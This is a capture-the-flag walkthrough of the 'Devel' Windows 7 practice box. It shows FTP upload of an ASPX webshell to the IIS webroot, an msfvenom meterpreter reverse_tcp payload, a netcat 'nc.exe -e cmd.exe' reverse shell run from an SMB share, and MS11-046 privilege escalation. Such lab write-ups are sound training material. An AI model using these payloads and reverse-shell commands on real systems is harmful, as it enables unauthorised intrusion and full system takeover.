Summary

Devel is an easy Windows box that can be exploited by properly enumerating the two open services. Anonymous FTP login is allowed, and the FTP root is the IIS webroot, so an ASPX payload uploaded over FTP can be executed simply by requesting it over HTTP. This gives a low-privileged shell as the IIS application pool identity. Privileges can be escalated with a kernel exploit for a missing patch (MS11-046) on this unpatched Windows 7 build.

Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.28.223

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Browsing to the web server shows only the default IIS 7 welcome page (the welcome.png image listed on FTP). Since anonymous FTP login is allowed, I went straight to investigate it. ftp devel.htb with the anonymous user shows the following files, which match the IIS default site exactly, so the FTP root is the webroot:

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

Exploitation

Method One (Meterpreter)

This is the easiest method, using Meterpreter and Msfvenom. From FTP enumeration it was pretty obvious that you can upload files and open them through your browser. The aspnet_client directory and the Microsoft-IIS/7.5 server header show this is an ASP.NET-capable IIS site, so the payload to upload is an ASPX webshell. I used this one. I uploaded it with the FTP put command. When navigating to http://devel.htb/shell.aspx the webshell is rendered, confirming that anything stored over FTP is served and executed by IIS.

I navigated through the filesystem a bit and attempted to get a reverse shell with netcat, but realised that you could simply upload a reverse shell with FTP. I generated an ASPX payload with msfvenom (x86, matching the target architecture):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.23 LPORT=4455 -f aspx > meterpreter.aspx

Uploaded this with FTP:

ftp> binary
200 Type set to I.
ftp> put meterpreter.aspx
local: meterpreter.aspx remote: meterpreter.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2843 bytes sent in 0.00 secs (31.1643 MB/s)

With FTP it's important to always set binary mode (TYPE I) before transferring such files; in ASCII mode the client rewrites line endings and the payload may not compile. After this you can set up a Metasploit multi/handler listener for windows/meterpreter/reverse_tcp on port 4455 and navigate to http://devel.htb/meterpreter.aspx. The HTTP request stays open while the payload runs; the listener receives a meterpreter session:

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo 
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

Method Two (SMB)

The second exploitation method is moving files back and forth over SMB. Impacket's smbserver.py was used to host a share on the attacking machine; it needs root (or sudo) because it binds port 445. Here the share is named share and backed by a local directory called smb:

sudo smbserver share smb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

After this a netcat listener was set up on port 4455. Finally, with a Windows nc.exe placed in the shared directory, you can run the following command from the webshell uploaded earlier; the target executes nc.exe straight from the UNC path, so nothing needs to be written to disk:

\\10.10.14.23\share\nc.exe -e cmd.exe 10.10.14.23 4455

This will open a netcat shell:

sudo nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.23] from (UNKNOWN) [10.129.34.0] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600

Privilege Escalation

I recommend running several automated enumeration scripts. In this case I ran both Jaws and WinPrivCheck.bat. The latter flagged the missing patch for MS11-046 (the Ancillary Function Driver, afd.sys, local privilege escalation), which fits the unpatched Windows 7 build 7600 seen in systeminfo.

The public exploit for MS11-046 can be compiled for x86 (the target architecture reported by sysinfo) and transferred to the target over FTP or the SMB share. After executing it:

c:\Windows\Temp>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Conclusion

This was quite an easy box. The FTP shell made it very easy to exploit and from reading other walkthroughs there were several other privesc methods. Hope you enjoyed this writeup!